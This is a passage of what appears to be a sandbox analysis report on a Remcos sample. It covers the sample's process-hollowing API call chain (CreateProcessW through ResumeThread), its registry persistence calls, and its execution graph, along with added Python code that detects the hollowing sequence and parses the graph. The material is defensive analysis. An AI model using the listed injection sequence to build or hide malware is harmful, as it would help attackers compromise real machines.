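    ("read_context",   {"GetThreadContext", "Wow64GetThreadContext",
                        "SetThreadContext", "Wow64SetThreadContext"},                  True),
    ("alloc_remote",   {"VirtualAllocEx", "NtAllocateVirtualMemory"},                  False),
    ("write_remote",   {"WriteProcessMemory", "NtWriteVirtualMemory"},                 False),
    ("set_context",    {"SetThreadContext", "Wow64SetThreadContext"},                  False),
    ("resume_thread",  {"ResumeThread", "NtResumeThread"},                             False),
]

# Matches "Name.MODULE(" as printed in the report, including the indented
# "Part of subcall function ...:" entries.
_API_RE = re.compile(r"\b([A-Za-z_][A-Za-z0-9_]*)\.(?:KERNEL32|KERNELBASE|NTDLL)\(")


def parse_api_name(line: str) -> Optional[str]:
    """Extract the API name from one report-style APIs entry, or None."""
    m = _API_RE.search(line)
    return m.group(1) if m else None


def find_hollowing(lines: List[str]) -> Optional[List[Tuple[int, str, str]]]:
    """Return [(line_no, stage, api), ...] once every mandatory stage has been
    met in order, else None. A call may repeat the stage just matched (second
    VirtualAllocEx, third WriteProcessMemory); optional stages may be skipped;
    unrelated or out-of-order calls are ignored rather than resetting."""
    matched: List[Tuple[int, str, str]] = []
    idx = 0  # index of the next stage to satisfy
    for n, line in enumerate(lines):
        api = parse_api_name(line)
        if api is None:
            continue
        if matched and api in STAGES[idx - 1][1]:      # repeat of the previous stage
            matched.append((n, STAGES[idx - 1][0], api))
            continue
        j = idx                                         # skip optional stages only
        while j < len(STAGES) and STAGES[j][2] and api not in STAGES[j][1]:
            j += 1
        if j < len(STAGES) and api in STAGES[j][1]:
            matched.append((n, STAGES[j][0], api))
            idx = j + 1
            if idx == len(STAGES):
                return matched
    return None


# Constructed trace: the API entries from this report's APIs lists, in the
# order the execution graph shows for the powershell stage (process 8).
REPORT_TRACE = [
    "• CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 02E1CB64",
    "• Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,197E608C,?,?,02E1C03A), ref: 02E1CCCB",
    "• VirtualAllocEx.KERNELBASE(?,?,00000000,?,?), ref: 02E1C20C",
    "• VirtualAllocEx.KERNEL32(?,?,00000000,?,?), ref: 02E1C300",
    "  • Part of subcall function 02E175C8: WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A86789D,00000000,?,?,?,197E608C,00000000,?,02E1C363,?,00000000,?), ref: 02E1D254",
    "  • Part of subcall function 02E175C8: WriteProcessMemory.KERNELBASE(...), ref: 02E1D254",
    "  • Part of subcall function 02E175C8: WriteProcessMemory.KERNELBASE(...), ref: 02E1D254",
    "• Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,197E608C,?,?,02E1C03A), ref: 02E1CCCB",
    "• ResumeThread.KERNELBASE(?), ref: 02E1C6AA",
]

# Constructed control (placeholder ref addresses): classic remote-thread
# injection shares the memory calls but creates no process and edits no
# thread context, so it must not match the hollowing model.
REMOTE_THREAD_TRACE = [
    "• OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00401000",
    "• VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00401020",
    "• WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00401040",
    "• CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,00000000), ref: 00401060",
]

if __name__ == "__main__":
    hit = find_hollowing(REPORT_TRACE)
    for n, stage, api in hit or []:
        print(f"line {n}: {stage:<14} {api}")
    print("remote-thread trace:", find_hollowing(REMOTE_THREAD_TRACE))
```

Running the block prints the nine matched entries for the report trace and `None` for the remote-thread control. Dropping the final ResumeThread line from the report trace also yields `None`, which is the intended behaviour: a chain that never resumes the hollowed thread is not yet a completed hollowing and should be reported separately, if at all.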

                                                                                                             Control-flow Graph
                                                                                                             • Function 2e17638, basic blocks 2e17638 through 2e182f9 (the executed/not-executed colouring of the original graph is not recoverable in this text export)
                                                                                                             • Subcalls: 2e172a4, 2e172b4 and 2e172c4 (from blocks 2e17703 and 2e17eb8), 2e16604 (from 2e17d23), 2e13824 and 2e16614 (from 2e181c9), 2e16624 (from 2e18219), and 2e1bd2f (from 2e182e8), the routine through which the CreateProcessW / VirtualAllocEx / WriteProcessMemory / Wow64SetThreadContext / ResumeThread chain shown in the Execution Graph is reached
                                                                                                             • No API is called directly from this function
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cba0ff182e916fcaee8fdb7211ec4d11f0a8c9a94694e3c942901879e382a5db
                                                                                                            • Instruction ID: e6ff7a578d45dc06c20536d94406a362b5ef7ea4df1b0a1f0e23d0032904ad06
                                                                                                            • Opcode Fuzzy Hash: cba0ff182e916fcaee8fdb7211ec4d11f0a8c9a94694e3c942901879e382a5db
                                                                                                            • Instruction Fuzzy Hash: 46721934A00259CFDB58DFA9D8587ADBBB3EB88305F148069EA0A97391DF344D85CF91
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,00000000,?,?), ref: 02E1C20C
                                                                                                            • VirtualAllocEx.KERNEL32(?,?,00000000,?,?), ref: 02E1C300
                                                                                                              • Part of subcall function 02E175C8: WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A86789D,00000000,?,?,?,197E608C,00000000,?,02E1C363,?,00000000,?), ref: 02E1D254
                                                                                                            • ResumeThread.KERNELBASE(?), ref: 02E1C6AA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual$MemoryProcessResumeThreadWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 2390764575-0
                                                                                                            • Opcode ID: 9c4bb74671837de478ea4849d1d217feef75caf075b320d0f83d002ea836344f
                                                                                                            • Instruction ID: a59871f9d0260c0a42da0a62452b4af73f2041c6a1b87601c245c9d1238044f6
                                                                                                            • Opcode Fuzzy Hash: 9c4bb74671837de478ea4849d1d217feef75caf075b320d0f83d002ea836344f
                                                                                                            • Instruction Fuzzy Hash: 58822B70A80359CFDB64CF64D944BAAB7F2BF44308F24E4AAD45AA7250DB70AD80CF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 129cef5f1f2c2d7f5f8ab16924458b1c0c07bef897576280d82d28f606b4386e
                                                                                                            • Instruction ID: 9024793cfa94c378ab22210b112a07ca7a7b9e537ad3a75b69a39171789756d1
                                                                                                            • Opcode Fuzzy Hash: 129cef5f1f2c2d7f5f8ab16924458b1c0c07bef897576280d82d28f606b4386e
                                                                                                            • Instruction Fuzzy Hash: 74424E74A80355CFDB30CF64D944BAAB7F1BB44318F24E5AAE49997245DB30E980CF51

                                                                                                             Control-flow Graph
                                                                                                             • Function 2e175a4, basic blocks 2e175a4 through 2e1cc29; the final block 2e1cc29 loops on itself (executed/not-executed colouring not recoverable in this text export)
                                                                                                             • API call: CreateProcessW in block 2e1cad4-2e1cb77; the failure branch goes to 2e1cb79-2e1cb7f
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 02E1CB64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 9086fc4163cc5d4fba9cd8e259ffc5c2af8ac72959bd0375c27ad5f2b0aeb059
                                                                                                            • Instruction ID: a9c792143a481f798872f821face89d73d34696841b84b9d97dad892ad1c3be0
                                                                                                            • Opcode Fuzzy Hash: 9086fc4163cc5d4fba9cd8e259ffc5c2af8ac72959bd0375c27ad5f2b0aeb059
                                                                                                            • Instruction Fuzzy Hash: 9A513871941229DFEF20CF99C940BDEBBB5BF48304F1085AAE909B7250DB759A84CF60

                                                                                                             Control-flow Graph
                                                                                                             • Function 2e1ca1f, basic blocks 2e1ca1f through 2e1cc29; same body as 2e175a4 above (wrapper entry and direct entry to the same code), final block 2e1cc29 loops on itself (executed/not-executed colouring not recoverable in this text export)
                                                                                                             • API call: CreateProcessW in block 2e1cad4-2e1cb77; the failure branch goes to 2e1cb79-2e1cb7f
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 02E1CB64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 963392458-0
                                                                                                            • Opcode ID: 262d697f80bc90cc490151c83a0bf86b2b46ddde3243056b7096466e69fabc82
                                                                                                            • Instruction ID: c16c2ed68644be0f37504456e3534463b6beb1b7b0f78548d0ab91dfa44de114
                                                                                                            • Opcode Fuzzy Hash: 262d697f80bc90cc490151c83a0bf86b2b46ddde3243056b7096466e69fabc82
                                                                                                            • Instruction Fuzzy Hash: F8512871941229DFEF24CF99C940BDEBBB5BF48304F1085AAE909B7250DB759A84CF60

                                                                                                             Control-flow Graph
                                                                                                             • Function 2e175c8, basic blocks 2e175c8-2e1d21e, 2e1d220-2e1d226, 2e1d228-2e1d261, 2e1d263-2e1d269 and 2e1d26a-2e1d28b (executed/not-executed colouring not recoverable in this text export)
                                                                                                             • API call: WriteProcessMemory in block 2e1d228-2e1d261; the failure branch goes to 2e1d263-2e1d269
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A86789D,00000000,?,?,?,197E608C,00000000,?,02E1C363,?,00000000,?), ref: 02E1D254
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 5c13818c2e62af47f093cf6d35b829a2cc5d335ae1bdbc66488a2107fea71ba5
                                                                                                            • Instruction ID: 31532b47482f413ca41df2800958dc3707e4b7716a50222f24b39e206591ff02
                                                                                                            • Opcode Fuzzy Hash: 5c13818c2e62af47f093cf6d35b829a2cc5d335ae1bdbc66488a2107fea71ba5
                                                                                                            • Instruction Fuzzy Hash: A921E4B5900319DFDB10CF9AD984BDEBBF4FB48324F10842AE958A7240D378A944CBA5

                                                                                                             Control-flow Graph
                                                                                                             • Function 2e1d1d7, basic blocks 2e1d1d7-2e1d21e, 2e1d220-2e1d226, 2e1d228-2e1d261, 2e1d263-2e1d269 and 2e1d26a-2e1d28b; same body as 2e175c8 above (executed/not-executed colouring not recoverable in this text export)
                                                                                                             • API call: WriteProcessMemory in block 2e1d228-2e1d261; the failure branch goes to 2e1d263-2e1d269
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A86789D,00000000,?,?,?,197E608C,00000000,?,02E1C363,?,00000000,?), ref: 02E1D254
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 4e00ad7d7961a72de844ae71bedc90e78ba33a9f876f60a15e4070293e51208b
                                                                                                            • Instruction ID: 8bfe64e3480ed91ac0698a8035699f32e8f7ffa2b787c66be595de4d42f321ed
                                                                                                            • Opcode Fuzzy Hash: 4e00ad7d7961a72de844ae71bedc90e78ba33a9f876f60a15e4070293e51208b
                                                                                                            • Instruction Fuzzy Hash: B921E4B59013199FDB10CF9AD985BDEBBF8FB48324F10842AE918A7240D378A544CBA5

                                                                                                             Control-flow Graph
                                                                                                             • Function 2e175d4, basic blocks 2e175d4-2e1cca0, 2e1cca2-2e1ccaa, 2e1ccac-2e1ccd8, 2e1ccda-2e1cce0 and 2e1cce1-2e1cd02 (executed/not-executed colouring not recoverable in this text export)
                                                                                                             • API call: Wow64SetThreadContext in block 2e1ccac-2e1ccd8; the failure branch goes to 2e1ccda-2e1cce0
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,197E608C,?,?,02E1C03A), ref: 02E1CCCB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0

Control-flow Graph
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,197E608C,?,?,02E1C03A), ref: 02E1CCCB
Memory Dump Source
• Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0

Control-flow Graph
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,197E608C,?,?,02E1C03A), ref: 02E1CCCB
Memory Dump Source
• Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0

Control-flow Graph
Memory Dump Source
• Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
Memory Dump Source
• Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Control-flow Graph
Memory Dump Source
• Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.2522270871.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_7380000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000008.00000002.2486713103.0000000002D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D3D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2d3d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                            • Opcode ID: a021405ccc292cb0545f71b14f148c05201ecf7b90040ee0df186f53d9d77ce7
                                                                                                            • Instruction ID: 99fdafb2c13945a6ab631a0a28187cbacf8505c8dfc391d26e81327219ff8b72
                                                                                                            • Opcode Fuzzy Hash: a021405ccc292cb0545f71b14f148c05201ecf7b90040ee0df186f53d9d77ce7
                                                                                                            • Instruction Fuzzy Hash: 6001F2724083409AE7224E25CD80B66BF98DF41B24F28C01AED480B342C7B89C41CEB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2486713103.0000000002D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D3D000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2d3d000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d5e1333e68d77dd8e14bfbce2cb9622ef3bec468fbd1392040eb080bbbd1ad3b
                                                                                                            • Instruction ID: d98e472d8f2d2226497ca0a92f147c8bf0c5b69b9ef454486237e9f97abf2d59
                                                                                                            • Opcode Fuzzy Hash: d5e1333e68d77dd8e14bfbce2cb9622ef3bec468fbd1392040eb080bbbd1ad3b
                                                                                                            • Instruction Fuzzy Hash: 5D014C6240E3C09EE7138B25CD94B52BFB4DF47624F1D81DBD9888F2A3C2695849CB72
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2487341851.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2e10000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f6ffadfb771d09e1e88b0db4910af7c4d826196edde7c371d1443a4e7230a776
                                                                                                            • Instruction ID: 836182d7aaa8df35d633d75b77859c70161d1b7bcc9e9c996637a147e66b50c1
                                                                                                            • Opcode Fuzzy Hash: f6ffadfb771d09e1e88b0db4910af7c4d826196edde7c371d1443a4e7230a776
                                                                                                            • Instruction Fuzzy Hash: 96D1B134F442598BDB189B7898646BE7BB6BFC4708F04D57EE442E7688DF349C0287A1

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:2.9%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:6.1%
                                                                                                            Total number of Nodes:981
                                                                                                            Total number of Limit Nodes:46
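The `execution_graph` text that follows is the report's call graph flattened into one token stream: `<node-id> <hex-address> [labels...]` declares a node (the labels are the Win32 API names called at that address, or a Joe Sandbox summary such as `21 API calls`, or a CRT symbol such as `___scrt_fastfail`), and `<id>-><id>` declares a call edge. Reading Remcos' registry persistence (`RegCreateKeyA` / `RegSetValueExA`), mutex creation (`CreateMutexA`) or the CryptoAPI random-number path out of a stream this size by eye is impractical, so the parser below turns it into nodes and edges and answers two questions an analyst actually asks: which API names are reachable from a given function, and which nodes call a given API. This is an added example, not Joe Sandbox code: the token grammar and the API-name heuristic are assumptions inferred from the graph text on this page, and the sample input is two slices copied verbatim from that text (the `CryptGenRandom` subgraph at `43256f` and the `RegSetValueExA` subgraph at `4126d2`).

```python
"""Parse the flattened `execution_graph` text that Joe Sandbox emits and
query it for Win32 API names.

Added example for this report, not Joe Sandbox code.  The token grammar is
inferred from the graph text on this page (assumption):
  <id> <hex-address> [label ...]   declares a node
  <id>-><id>                       declares a call edge
  any other token                  is a label of the most recent node
"""
import re
from collections import defaultdict, deque

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]+$")           # addresses are lowercase hex
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]+$")    # heuristic for Win32 API names

# Constructed sample: two slices copied verbatim from the execution_graph text
# in this report (CryptGenRandom subgraph, then the RegSetValueExA subgraph).
SAMPLE = """
46158 43256f 46145->46158 46159 432588 46158->46159 46163 43257e 46158->46163 46160 431f99 21 API calls 46159->46160 46159->46163 46161 4325a9 46160->46161 46161->46163 46164 43293a CryptAcquireContextA 46161->46164 46163->46147 46165 432956 46164->46165 46166 43295b CryptGenRandom 46164->46166 46165->46163 46166->46165 46167 432970 CryptReleaseContext 46166->46167 46167->46165
46705 4126d2 RegCreateKeyA 46415->46705 46706 412722 46705->46706 46708 4126eb 46705->46708 46707 401eea 26 API calls 46706->46707 46709 40dd3b 46707->46709 46710 4126fd RegSetValueExA RegCloseKey 46708->46710 46709->46424 46710->46706
"""


def parse_execution_graph(text):
    """Return (nodes, edges).

    nodes: {id: {"address": "43256f", "labels": [...]}}
    edges: [(src_id, dst_id), ...]
    A node starts at an all-digit token followed by a lowercase-hex token; the
    "21 API calls" summaries never match because "API" is not hex.
    """
    tokens = text.split()
    nodes, edges = {}, []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            current = None                       # an edge ends the label run
            i += 1
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else None
        if tok.isdigit() and nxt is not None and ADDR_RE.match(nxt):
            current = int(tok)
            nodes[current] = {"address": nxt, "labels": []}
            i += 2
            continue
        if current is not None:                  # label of the open node
            nodes[current]["labels"].append(tok)
        i += 1
    return nodes, edges


def api_names(node):
    """Labels that look like Win32 API names; 'API' (from 'N API calls') is noise."""
    return [t for t in node["labels"] if API_RE.match(t) and t != "API"]


def reachable_apis(nodes, edges, start):
    """Sorted API-like names on every node reachable from `start` (BFS)."""
    adj = defaultdict(list)
    for src, dst in edges:
        adj[src].append(dst)
    seen, queue, found = {start}, deque([start]), set()
    while queue:
        n = queue.popleft()
        if n in nodes:                           # targets outside the slice are skipped
            found.update(api_names(nodes[n]))
        for dst in adj.get(n, ()):
            if dst not in seen:
                seen.add(dst)
                queue.append(dst)
    return sorted(found)


def nodes_calling(nodes, *apis):
    """Sorted ids of nodes whose labels mention any of the given API names."""
    want = set(apis)
    return sorted(i for i, n in nodes.items() if want & set(n["labels"]))


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE)
    print(len(nodes), "nodes,", len(edges), "edges")
    print("from 43256f:", reachable_apis(nodes, edges, 46158))
    print("from 4126d2:", reachable_apis(nodes, edges, 46705))
    print("persistence writers:", nodes_calling(nodes, "RegSetValueExA"))
```

Run it against the whole `execution_graph` text of a report (paste it into `SAMPLE` or read it from a file) and start the BFS at the node for `WinMain`-level code to get a flat list of every API the sample can reach; the node ids are stable within one report, so the ids printed here can be looked up directly in the listing.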
                                                                                                            execution_graph 46123 41d4d0 46124 41d4e6 _Yarn ___scrt_fastfail 46123->46124 46126 431f99 21 API calls 46124->46126 46138 41d6e3 46124->46138 46129 41d696 ___scrt_fastfail 46126->46129 46127 41d6f4 46128 41d734 46127->46128 46136 41d760 46127->46136 46140 431f99 46127->46140 46129->46128 46131 431f99 21 API calls 46129->46131 46134 41d6be ___scrt_fastfail 46131->46134 46133 41d72d ___scrt_fastfail 46133->46128 46145 43264f 46133->46145 46134->46128 46137 431f99 21 API calls 46134->46137 46136->46128 46148 41d474 21 API calls ___scrt_fastfail 46136->46148 46137->46138 46138->46128 46139 41d071 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46138->46139 46139->46127 46141 431fa3 46140->46141 46142 431fa7 46140->46142 46141->46133 46149 43a88c 46142->46149 46158 43256f 46145->46158 46147 432657 46147->46136 46148->46128 46154 446aff _strftime 46149->46154 46150 446b3d 46157 445354 20 API calls __dosmaperr 46150->46157 46152 446b28 RtlAllocateHeap 46153 431fac 46152->46153 46152->46154 46153->46133 46154->46150 46154->46152 46156 442200 7 API calls 2 library calls 46154->46156 46156->46154 46157->46153 46159 432588 46158->46159 46163 43257e 46158->46163 46160 431f99 21 API calls 46159->46160 46159->46163 46161 4325a9 46160->46161 46161->46163 46164 43293a CryptAcquireContextA 46161->46164 46163->46147 46165 432956 46164->46165 46166 43295b CryptGenRandom 46164->46166 46165->46163 46166->46165 46167 432970 CryptReleaseContext 46166->46167 46167->46165 46168 426030 46173 4260f7 recv 46168->46173 46174 44e8b6 46175 44e8c1 46174->46175 46176 44e8e9 46175->46176 46177 44e8da 46175->46177 46181 44e8f8 46176->46181 46196 455573 27 API calls 2 library calls 46176->46196 46195 445354 20 API calls __dosmaperr 46177->46195 46183 44b9be 46181->46183 46182 44e8df ___scrt_fastfail 46184 44b9d6 46183->46184 46185 44b9cb 46183->46185 46187 
44b9de 46184->46187 46193 44b9e7 _strftime 46184->46193 46197 446aff 21 API calls 3 library calls 46185->46197 46198 446ac5 20 API calls __dosmaperr 46187->46198 46188 44ba11 RtlReAllocateHeap 46192 44b9d3 46188->46192 46188->46193 46189 44b9ec 46199 445354 20 API calls __dosmaperr 46189->46199 46192->46182 46193->46188 46193->46189 46200 442200 7 API calls 2 library calls 46193->46200 46195->46182 46196->46181 46197->46192 46198->46192 46199->46192 46200->46193 46201 426091 46206 42610e send 46201->46206 46207 43a998 46210 43a9a4 _swprintf ___scrt_is_nonwritable_in_current_image 46207->46210 46208 43a9b2 46225 445354 20 API calls __dosmaperr 46208->46225 46210->46208 46213 43a9dc 46210->46213 46211 43a9b7 46226 43a827 26 API calls _Deallocate 46211->46226 46220 444acc EnterCriticalSection 46213->46220 46215 43a9e7 46221 43aa88 46215->46221 46218 43a9c2 std::_Locinfo::_Locinfo_dtor 46220->46215 46222 43aa96 46221->46222 46224 43a9f2 46222->46224 46228 448416 39 API calls 2 library calls 46222->46228 46227 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 46224->46227 46225->46211 46226->46218 46227->46218 46228->46222 46229 4339be 46230 4339ca ___scrt_is_nonwritable_in_current_image 46229->46230 46261 4336b3 46230->46261 46232 4339d1 46233 433b24 46232->46233 46236 4339fb 46232->46236 46561 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46233->46561 46235 433b2b 46562 4426be 28 API calls _Atexit 46235->46562 46248 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46236->46248 46555 4434d1 5 API calls CatchGuardHandler 46236->46555 46238 433b31 46563 442670 28 API calls _Atexit 46238->46563 46241 433a14 46243 433a1a 46241->46243 46556 443475 5 API calls CatchGuardHandler 46241->46556 46242 433b39 46245 433a9b 46272 433c5e 46245->46272 46248->46245 46557 43edf4 38 API calls 4 library calls 46248->46557 46255 433abd 46255->46235 46256 433ac1 46255->46256 46257 433aca 
46256->46257 46559 442661 28 API calls _Atexit 46256->46559 46560 433842 13 API calls 2 library calls 46257->46560 46260 433ad2 46260->46243 46262 4336bc 46261->46262 46564 433e0a IsProcessorFeaturePresent 46262->46564 46264 4336c8 46565 4379ee 10 API calls 3 library calls 46264->46565 46266 4336cd 46271 4336d1 46266->46271 46566 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46266->46566 46268 4336da 46269 4336e8 46268->46269 46567 437a17 8 API calls 3 library calls 46268->46567 46269->46232 46271->46232 46568 436050 46272->46568 46275 433aa1 46276 443422 46275->46276 46570 44ddc9 46276->46570 46278 433aaa 46281 40d767 46278->46281 46279 44342b 46279->46278 46574 44e0d3 38 API calls 46279->46574 46576 41bce3 LoadLibraryA GetProcAddress 46281->46576 46283 40d783 GetModuleFileNameW 46581 40e168 46283->46581 46285 40d79f 46596 401fbd 46285->46596 46288 401fbd 28 API calls 46289 40d7bd 46288->46289 46600 41afc3 46289->46600 46293 40d7cf 46625 401d8c 46293->46625 46295 40d7d8 46296 40d835 46295->46296 46297 40d7eb 46295->46297 46631 401d64 46296->46631 46882 40e986 111 API calls 46297->46882 46300 40d845 46303 401d64 28 API calls 46300->46303 46301 40d7fd 46302 401d64 28 API calls 46301->46302 46306 40d809 46302->46306 46304 40d864 46303->46304 46636 404cbf 46304->46636 46883 40e937 68 API calls 46306->46883 46307 40d873 46640 405ce6 46307->46640 46310 40d824 46884 40e155 68 API calls 